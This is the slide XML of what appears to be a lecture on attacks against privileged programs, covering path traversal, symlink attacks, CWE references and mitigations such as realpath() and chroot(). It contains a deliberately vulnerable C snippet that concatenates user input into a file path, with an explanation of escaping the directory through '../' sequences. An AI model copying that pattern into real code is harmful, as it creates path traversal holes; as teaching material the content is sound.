        <p:nvSpPr>
          <p:cNvPr id="514051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks exploit SUID programs to gain additional privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Startup: command line, environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During execution: dynamic-linked objects, file input, socket input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interaction with the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File system: creation of files, access to files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes: signals, invocation of other commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks exploit network-available services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inputs and interaction: via sockets (TCP/UDP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1474235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Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File access attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path traversal attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link manipulation attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment variable attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TOCTTOU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File handler reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack corruption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format string exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314239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Path Traversal Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to files in the file system is performed by using path strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker has a way to control how a privileged application builds a path string, it can lure the application into violating the security policy of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382023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7467600" y="3629085"/>
            <a:ext cx="1447800" cy="117151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7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4375652" y="1356460"/>
            <a:ext cx="2938675" cy="209943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 name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4822187" y="1714248"/>
            <a:ext cx="2088558" cy="1527208"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1794692" y="3629085"/>
            <a:ext cx="5562491" cy="1062748"/>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5" name="Can 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346952" y="3770785"/>
            <a:ext cx="1039031" cy="858070"/>
          </a:xfrm>
          <a:prstGeom prst="can">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11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2319455" y="2054645"/>
            <a:ext cx="1427357" cy="106274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12" name="Cloud 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="220400" y="3770785"/>
            <a:ext cx="1456001" cy="921048"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5426033" y="3445382"/>
            <a:ext cx="871145" cy="10493"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3022636" y="2605699"/>
            <a:ext cx="2466388" cy="1598057"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2466388"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2130743"/>
              <a:gd name="connsiteX1" fmla="*/ 10496 w 2466388"/>
              <a:gd name="connsiteY1" fmla="*/ 2130743 h 2130743"/>
              <a:gd name="connsiteX2" fmla="*/ 1889148 w 2466388"/>
              <a:gd name="connsiteY2" fmla="*/ 2120247 h 2130743"/>
              <a:gd name="connsiteX3" fmla="*/ 2466388 w 2466388"/>
              <a:gd name="connsiteY3" fmla="*/ 461836 h 2130743"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2466388" h="2130743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3499" y="710248"/>
                  <a:pt x="10496" y="2130743"/>
                  <a:pt x="10496" y="2130743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1889148" y="2120247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466388" y="461836"/>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4" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="734669" y="3015053"/>
            <a:ext cx="4932774" cy="1346147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4932774"/>
              <a:gd name="connsiteY0" fmla="*/ 1794862 h 1794862"/>
              <a:gd name="connsiteX1" fmla="*/ 4355535 w 4932774"/>
              <a:gd name="connsiteY1" fmla="*/ 1784366 h 1794862"/>
              <a:gd name="connsiteX2" fmla="*/ 4932774 w 4932774"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1794862"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4932774" h="1794862">
                <a:moveTo>
                  <a:pt x="0" y="1794862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4355535" y="1784366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4932774" y="0"/>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5" name="Freeform 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6066263" y="3022926"/>
            <a:ext cx="1574290" cy="1172959"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1574290 w 1574290"/>
              <a:gd name="connsiteY0" fmla="*/ 1553448 h 1563945"/>
              <a:gd name="connsiteX1" fmla="*/ 713678 w 1574290"/>
              <a:gd name="connsiteY1" fmla="*/ 1563945 h 1563945"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1574290"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1563945"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1574290" h="1563945">
                <a:moveTo>
                  <a:pt x="1574290" y="1553448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="713678" y="1563945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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6" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519809" y="2247909"/>
            <a:ext cx="1005654"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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325492" y="3874659"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5133319" y="1389306"/>
            <a:ext cx="1467068"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Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393895" y="3909284"/>
            <a:ext cx="945917" cy="646331"/>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File </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7624052" y="3550309"/>
            <a:ext cx="1077902"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Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200019" y="2247909"/>
            <a:ext cx="1312679"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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079178" y="3701535"/>
            <a:ext cx="477602"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OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Graphic 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD30D16A-E67D-219F-6F2F-EA165B21CBE0}"/>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8370"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7797005" y="3886201"/>
            <a:ext cx="750474" cy="759638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2823498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Path Traversal Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application builds a path by concatenating a path prefix with values provided by the user (the attacker)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/log/app/”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>free_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) ;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file = open(path, O_RDWR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user (attacker) provides a filename containing a number of “../” that allow for escaping from the directory and access any file in the file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also called: the “directory traversal” or “dot-dot” attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129708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FD3C-58C0-F2B7-6F6D-78E81311BFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: CVE-2023-3961</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{766518D7-AB50-FACE-6F40-342A24D69A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1D638A8-2372-73ED-DB5E-91457061217A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511166" y="1240456"/>
            <a:ext cx="4793855" cy="3489608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3847009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Characterizing how data flows throughout the application is key in determining how file paths are determined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input provided by the user should be heavily sanitized before being used in creating a file path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>realpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() function can be used to convert a file path to canonical form, which can then be verified according to a security policy </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>chroot() can be used to confine an application to a subset of the file system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2600141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Link Manipulation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some applications check the path to a file (e.g., to verify that the file is under a certain directory) but not the nature of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By creating symbolic links an attacker can force an application to access files outside the intended path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an application creates a temporary file, it might not check for its properties in the assumption that the file has been created with the correct privileges </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CWE-59: Improper Link Resolution Before File Access ('Link Following')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CWE-61: UNIX Symbolic Link (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Symlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) Following</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3636015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E465-D854-3CF4-E091-9DC90AABA4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2024-39578</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89305E50-83B0-E8A2-9D43-C9BF7C1762C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9F7E996-1427-2318-3885-EC616C963D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737652" y="1357161"/>
            <a:ext cx="5668696" cy="3311649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4279887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765B-5167-E34C-CAE5-C67CD0633264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blast from the Past: CVE-1999-0014</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
